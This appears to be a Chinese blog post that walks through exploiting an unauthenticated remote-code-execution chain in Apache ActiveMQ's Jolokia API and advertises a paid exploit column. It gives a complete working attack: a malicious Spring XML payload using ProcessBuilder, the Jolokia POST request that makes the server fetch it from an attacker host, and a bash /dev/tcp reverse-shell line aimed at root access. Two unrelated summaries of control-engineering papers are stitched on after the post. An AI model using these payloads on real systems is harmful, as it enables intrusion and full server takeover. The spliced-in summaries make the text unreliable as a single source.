无账号直接拿 root!ActiveMQ Jolokia双CVE组合RCE完整复现

发生了什么?

前两天复现 Apache ActiveMQ 的一个漏洞组合,结果让我有点意外——不需要任何账号密码,一个 HTTP 请求下去,服务器的 root 权限就到手了。

不是我在吹,是真的就这么离谱。

这个漏洞组合涉及两个 CVE:CVE-2024-32114CVE-2026-34197。Apache ActiveMQ 是个 Java 写的企业消息中间件,默认在 8161 端口提供 Web 管理界面。它的后台管理依赖一个叫 Jolokia 的组件——这玩意负责把 Java 的管理接口转成 HTTP API,让前端页面能调。

问题出在两步上:第一步,开发团队给 /admin/* 路径加了登录校验,但忘了/api/jolokia/ 也加(CVE-2024-32114)。第二步,Jolokia 暴露的一个 MBean 方法 addNetworkConnector() 可以接收外部传入的远程 XML 配置地址,然后老老实实下载并执行其中的命令(CVE-2026-34197)。

分开看,一个 API 没锁门,一个有执行能力但要先认证。合在一起——门开着,枪在桌上,你拿起就能开。

最后效果就是:

在这里插入图片描述

一个 POST 请求下去,Shell 弹回来了,直接 root 权限。就是这种感觉。

有多严重?——POC验证

先搭个环境,一行命令的事:

docker compose up -d

访问 http://your-ip:8161,看到 ActiveMQ 6.1.1 的欢迎页:

在这里插入图片描述
在这里插入图片描述

首先验证未授权访问到底存不存在。直接在浏览器里访问:

http://your-ip:8161/api/jolokia/list

返回了 200 OK 和一串超长的 JSON——里面是 ActiveMQ 所有已注册的 MBean 列表,包括 Broker 的各种操作方法。注意看,这个请求没有带任何认证信息

在这里插入图片描述

接下来是 POC 验证。你在攻击机上创建一个恶意 XML 文件 poc.xml

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
       http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="exec" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>bash</value>
                <value>-c</value>
                <value><![CDATA[id > /tmp/success]]></value>
            </list>
        </constructor-arg>
    </bean>
</beans>

简单解释一下这个 XML 在干什么:它定义了一个 ProcessBuilder 对象(Java 里执行系统命令的类),并且设置了 init-method="start"——意思是这个对象一旦被创建,就自动调用 start() 方法执行命令。命令是 id > /tmp/success,把当前用户信息写到一个文件里。

然后在 XML 所在目录启动一个 HTTP 服务:

python3 -m http.server 25000

最后发送攻击请求:

POST /api/jolokia/ HTTP/1.1
Host: your-ip:8161
Content-Type: application/json

{
  "type": "exec",
  "mbean": "org.apache.activemq:type=Broker,brokerName=localhost",
  "operation": "addNetworkConnector(java.lang.String)",
  "arguments": ["static:(vm://evil?brokerConfig=xbean:http://攻击IP:25000/poc.xml)"]
}

这个请求的核心在 arguments 那个字符串里。它告诉 ActiveMQ:“去连接一个叫 evil 的本地 broker”,evil 不存在,于是 ActiveMQ 按 brokerConfig 参数里的地址去攻击机上下载了 poc.xml。Spring 框架解析了这个 XML,创建了 ProcessBuilder,命令自动执行。

在这里插入图片描述

验证一下命令是否执行成功:

docker compose exec activemq cat /tmp/success

看到 uid=0(root) 的输出——命令成功执行。至此,已经证明这个漏洞组合确实能在服务器上执行任意命令。

真正的门槛在哪?

看到这里你可能觉得:“好像也没多难啊,把 id 命令换成反弹 Shell 不就行了?”

我当时也是这么想的。信心满满地把 id > /tmp/success 换成了 bash -i >& /dev/tcp/攻击IP/端口 0>&1,XML 文件重新存了一个,HTTP 服务器重新跑起来,攻击请求重新发了一发。

然后我盯着 nc 监听的空白终端,等了三十秒。什么都没有。

我检查了 XML 语法、确认了 HTTP 服务器日志里收到了 GET 请求、验证了目标容器确实能连到攻击机——全都没问题。

问题出在哪?答案不止一个——网络端口可能被云防火墙挡了,vm:// 后面的名字重复导致第二次攻击被跳过,甚至 XML 里少写了一个 CDATA 块命令就被解析器咬掉了。看起来简单的一条"换条命令",实操中至少有四五个地方能让你翻车。我在这些坑里踩了两天才一个个爬出来。

如果你想走完这条路

我把从环境搭建到最终反弹 Shell 的完整过程——包括每一次试错、每一次失败的排查思路、最终绕过方案的原理拆解,以及一个一键利用脚本——都整理在了付费专栏里。

本篇文章完整版详见 【GetShell】Apache ActiveMQ Jolokia未授权和远程代码执行漏洞 (CVE-2026-34197)👉点击直达

本篇文章视频演示:无账号直接拿 root!ActiveMQ Jolokia双CVE组合RCE完整复现 👉点击直达

专栏的名字叫 高危漏洞深度利用—零基础GetShell的全链路实战指南👉点击直达。核心就是不止于 POC 复现,每篇文章必须走到拿下服务器。如果你不想自己从头踩一遍编码绕过、网络配置、云防火墙这些坑,可以翻翻。

复现过程中有问题直接评论区留言,我看到了会回。


本文仅用于合法的安全研究和教育目的。请确保你测试的系统是你拥有合法授权的靶场环境。请遵守《中华人民共和国网络安全法》。

内容概要:本文深入研究了基于最优滑模控制的永磁同步电机(PMSM)调速系统模型,重点利用Simulink工具搭建并仿真了该控制系统的动态响应特性。文章系统阐述了最优滑模控制策略的设计原理,突出其在削弱传统滑模控制固有抖振现象、增强系统鲁棒性方面的显著优势。通过与传统滑模控制方法的对比实验,充分验证了所提出方法在调速精度、抗外部干扰能力以及动态响应速度等方面的优越性能。研究内容涵盖PMSM数学建模、滑模面构造、最优控制律推导、Lyapunov稳定性分析、参数整定及Simulink仿真验证等完整环节,形成了一套严谨的控制算法设计与实现流程。; 适合人群:具备自动控制原理、现代控制理论基础和MATLAB/Simulink仿真操作能力,从事电机驱动控制、电力电子与电力传动、运动控制或自动化等相关领域研究的工程技术人员及高校研究生。; 使用场景及目标:① 深入掌握滑模控制理论及其在高性能电机调速系统中的具体应用方法;② 学习如何设计并实现能够有效抑制抖振的最优滑模控制器,以提升系统整体鲁棒性和控制品质;③ 利用Simulink平台独立完成从理论建模到仿真验证的全过程,服务于科研课题、课程设计或实际工程项目。; 阅读建议:建议读者务必结合MATLAB/Simulink环境动手复现文中模型,重点关注滑模切换面的设计准则、控制律的数学推导过程以及控制器参数的调节规律,并通过施加不同的负载扰动、设定多种转速指令等方式全面测试系统的动态与稳态性能,从而深刻理解最优滑模控制的核心机理与工程应用价值。
内容概要:本文提出了一种基于数据驱动的Koopman算子与递归神经网络(RNN)相结合的模型线性化方法,旨在解决纳米定位系统中因强非线性、迟滞和蠕变效应导致的建模困难问题。该方法通过Koopman算子将非线性动态系统映射至高维线性空间,利用RNN学习系统的时间序列演化特征,从而实现对复杂动态行为的精确建模与预测,并进一步集成于模型预测控制(MPC)框架中,显著提升了纳米定位系统的控制精度、动态响应能力与运行稳定性。整个算法体系在Matlab平台上完成代码实现与仿真实验验证,展示了良好的控制性能与工程应用潜力。; 适合人群:具备控制理论、非线性系统建模、机器学习及智能控制基础,从事精密仪器控制、高端制造装备研发、自动化系统设计等领域的研究生、科研人员及工程技术开发者。; 使用场景及目标:①应对扫描探针显微镜、光刻机、超精密加工平台等纳米级定位设备中的非线性建模挑战;②提升高精度运动系统的实时预测控制性能,抑制迟滞与蠕变带来的定位误差;③为数据驱动的非线性系统线性化与先进控制策略(如MPC)的融合提供可复现、可扩展的技术范例。; 阅读建议:建议读者结合提供的Matlab代码,深入理解Koopman观测矩阵构造、RNN网络训练流程及MPC控制器设计之间的协同机制,重点关注数据预处理、特征提取、模型训练与闭环控制仿真的完整链路,以便在相似高精度控制系统中进行迁移与优化应用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

光跃Eason

坚持下去,谢谢你的鼓励!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值